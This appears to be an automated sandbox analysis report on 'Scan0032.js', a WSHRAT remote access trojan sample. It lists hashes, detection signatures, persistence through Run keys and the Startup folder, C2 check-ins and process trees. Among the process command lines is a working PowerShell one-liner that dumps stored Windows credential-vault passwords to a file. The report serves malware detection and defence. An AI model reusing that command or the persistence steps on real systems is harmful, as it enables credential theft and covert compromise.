Analysis

Max time kernel: 149s
Max time network: 152s
Platform: windows10_x64
Resource: win10v20210408
Submitted: 01/10/2021, 10:33
Static task: static1
Behavioral task: behavioral1
Sample: Scan0032.js
Resource: win7-en-20210920

General

Target: Scan0032.js
Size: 1.1MB
MD5: 126c1417ab24cd6b4bf8889a5254ae18
SHA1: b9465bbe07f047f063f8e2a2e3dba87181fceac6
SHA256: bd1b9e3102b57857d294df0339682f25e2ccb17d0665c77dfefe6565a68f85ff
SHA512: bca88a55671be0e903f9ddaa9002dc37ba0c97f7c15431f09069c3740c41e5702fafa900bdaf0a0d436fc6bd50c669e4a22a70ac28b909ddc98726da24959a55
Malware Config

Signatures

- suricata: ET MALWARE WSHRAT CnC Checkin
- suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound
- suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
- NirSoft MailPassView (2 IoCs)
  Password recovery tool for various email clients
    resource                                      yara_rule
    behavioral2/files/0x000100000001b086-180.dat  MailPassView
    behavioral2/files/0x000100000001b086-181.dat  MailPassView
- Nirsoft (2 IoCs)
    resource                                      yara_rule
    behavioral2/files/0x000100000001b086-180.dat  Nirsoft
    behavioral2/files/0x000100000001b086-181.dat  Nirsoft
- Blocklisted process makes network request (23 IoCs)
    pid 4060 wscript.exe, flows 3, 5, 6, 7, 8, 9, 11, 18, 19, 20, 21, 26, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39
- Executes dropped EXE (2 IoCs)
    pid   Process
    768   python.exe
    3832  cmdc.exe
- Drops startup file (2 IoCs)
    description                  ioc                                                                                        Process
    File created                 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0032.js  wscript.exe
    File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0032.js  wscript.exe
- Loads dropped DLL (2 IoCs)
    pid 768 python.exe (2 events)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 4 IoCs)
    description      ioc                                                                                                                                                                                            Process
    Key created      \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\software\microsoft\windows\currentversion\run                                                                                    wscript.exe
    Set value (str)  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan0032 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scan0032.js\""  wscript.exe
    Key created      \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run                                                                                                                                wscript.exe
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0032 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scan0032.js\""                                           wscript.exe
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
    flow  ioc
    4     ip-api.com
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Kills process with taskkill (2 IoCs)
    pid   Process
    3748  taskkill.exe
    2416  taskkill.exe
- Script User-Agent (21 IoCs)
  Uses user-agent string associated with script host/environment.
    description             flow                                                                        ioc
    HTTP User-Agent header  3                                                                           Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header  6, 7, 8, 9, 18, 19, 20, 21, 26, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39  WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
    pid 2700 powershell.exe (3 events)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
    description              pid   Process
    Token: SeDebugPrivilege  2700  powershell.exe
    Token: 35                768   python.exe
    Token: SeDebugPrivilege  3748  taskkill.exe
    Token: SeDebugPrivilege  2416  taskkill.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
    description                       pid   Process      procid_target  events
    PID 4060 wrote to memory of 2700  4060  wscript.exe  74             2
    PID 4060 wrote to memory of 3636  4060  wscript.exe  78             2
    PID 3636 wrote to memory of 768   3636  cmd.exe      80             3
    PID 4060 wrote to memory of 2432  4060  wscript.exe  82             2
    PID 2432 wrote to memory of 3748  2432  cmd.exe      84             2
    PID 4060 wrote to memory of 3680  4060  wscript.exe  85             2
    PID 3680 wrote to memory of 2416  3680  cmd.exe      87             2
    PID 4060 wrote to memory of 3832  4060  wscript.exe  88             3
    PID 4060 wrote to memory of 2756  4060  wscript.exe  90             2
Processes

- C:\Windows\system32\wscript.exe (PID 4060)
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan0032.js
  - Blocklisted process makes network request
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2700)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\system32\cmd.exe (PID 3636)
    Command line: "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
    - Suspicious use of WriteProcessMemory

    - C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe (PID 768)
      Command line: C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\system32\cmd.exe (PID 2432)
    Command line: "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
    - Suspicious use of WriteProcessMemory

    - C:\Windows\system32\taskkill.exe (PID 3748)
      Command line: taskkill /F /IM cmdc.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\system32\cmd.exe (PID 3680)
    Command line: "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
    - Suspicious use of WriteProcessMemory

    - C:\Windows\system32\taskkill.exe (PID 2416)
      Command line: taskkill /F /IM cmdc.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

  - C:\Users\Admin\AppData\Local\Temp\cmdc.exe (PID 3832)
    Command line: "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
    - Executes dropped EXE

  - C:\Windows\system32\cmd.exe (PID 2756)
    Command line: "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"

- C:\Windows\System32\rundll32.exe (PID 2244)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding